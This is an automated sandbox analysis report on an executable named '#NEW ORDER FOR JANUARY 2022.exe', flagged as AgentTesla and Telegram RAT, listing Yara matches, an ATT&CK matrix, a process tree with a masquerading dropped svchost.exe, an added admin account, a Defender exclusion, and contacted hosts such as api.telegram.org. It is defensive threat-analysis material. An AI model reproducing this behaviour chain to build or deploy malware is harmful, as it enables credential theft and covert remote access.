Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Telegram RAT
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.470db20.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42a5900.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.46edb00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.4aadb00.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.4aedb20.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.474db40.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.4aadb00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.470db20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.svchost.exe.4aedb20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.svchost.exe.474db40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000000.788423328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.931530989.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000000.784941162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000000.790295907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000000.817068526.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000000.786765310.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000000.890224140.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000000.885768767.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.927080316.0000000004715000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000000.845760653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000000.883261997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000003B.00000002.932852897.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000000.814526101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000000.843348334.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.886344519.0000000003C5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000000.847213598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000000.815839505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000000.818834012.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000000.840897044.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000002.931663085.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.931619495.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.909583647.00000000040C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4eab090.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4e74670.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000003.829188638.00000000043CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR

                      Remote Access Functionality:

Yara detected Telegram RAT
Yara detected AgentTesla

                      Mitre Att&ck Matrix

Techniques are listed per tactic column; the digits that follow a technique name are the matched-signature counts shown in the report.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Windows Management Instrumentation 211, Scheduled Task/Job 1, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
Persistence: Create Account 1, Scheduled Task/Job 1, Registry Run Keys / Startup Folder 21, Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Privilege Escalation: Process Injection 212, Scheduled Task/Job 1, Registry Run Keys / Startup Folder 21, Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Defense Evasion: Disable or Modify Tools 11, Deobfuscate/Decode Files or Information 1, Obfuscated Files or Information 2, Software Packing 3, Timestomp 1, Masquerading 221, Virtualization/Sandbox Evasion 141, Process Injection 212, Hidden Users 1
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery 1, System Information Discovery 113, Query Registry 1, Security Software Discovery 321, Process Discovery 2, Virtualization/Sandbox Evasion 141, Application Window Discovery 1, Network Service Scanning, System Network Connections Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
Collection: Archive Collected Data 11, Clipboard Data 1, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Web Service 1, Encrypted Channel 1, Non-Application Layer Protocol 1, Application Layer Protocol 1, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction

                      Behavior Graph

Behavior Graph ID: 553020 | Sample: #NEW ORDER FOR JANUARY 2022.exe | Start date: 14/01/2022 | Architecture: WINDOWS | Score: 100

The graph's nodes and edges, written out as a process tree (node numbers are the graph's own; the counters next to a process name are the created-item counters drawn on the node):

Root (node 2)
• DNS/IP: 192.168.2.1 (unknown, unknown); api.telegram.org
• Signatures: Multi AV Scanner detection for submitted file; Yara detected UAC Bypass using CMSTP; Yara detected AgentTesla; 15 other signatures
• Started: #NEW ORDER FOR JANUARY 2022.exe (node 8, counters 5 6); svchost.exe (node 12); svchost.exe (node 14); 2 other processes (node 16)

#NEW ORDER FOR JANUARY 2022.exe (node 8)
• Dropped: C:\Windows\Microsoft.NET\...\svchost.exe (PE32); C:\...\#NEW ORDER FOR JANUARY 2022.exe.log (ASCII)
• Signatures: Creates autostart registry keys with suspicious names; Creates an autostart registry key pointing to binary in C:\Windows; Writes to foreign memory regions; Adds a new user with administrator rights
• Started: net.exe (node 18, counter 1); aspnet_regbrowsers.exe (node 20); net.exe (node 23, counter 1); 8 other processes (node 29)

svchost.exe (node 12)
• Signatures: Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
• Started: powershell.exe (node 25); aspnet_regbrowsers.exe (node 27)

net.exe (node 18)
• Started: net1.exe (node 31, counter 1); conhost.exe (node 34)

aspnet_regbrowsers.exe (node 20)
• Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

net.exe (node 23)
• Started: conhost.exe (node 36); net1.exe (node 38, counter 1)

powershell.exe (node 25)
• Started: conhost.exe (node 40)

8 other processes (node 29)
• Started: conhost.exe (node 42); conhost.exe (node 44); conhost.exe (node 46); 6 other processes (node 48)

net1.exe (node 31)
• Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
#NEW ORDER FOR JANUARY 2022.exe | 19% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

Source | Detection | Scanner | Label
C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | 19% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

Source | Detection | Scanner | Label
37.2.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
31.0.aspnet_regbrowsers.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
31.0.aspnet_regbrowsers.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
31.0.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
37.0.aspnet_regbrowsers.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
31.0.aspnet_regbrowsers.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
37.0.aspnet_regbrowsers.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
31.0.aspnet_regbrowsers.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
31.2.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
37.0.aspnet_regbrowsers.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
37.0.aspnet_regbrowsers.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
37.0.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://tempuri.org/ | 0% | URL Reputation | safe
http://YsLVkm.com | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | - | high

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp; aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
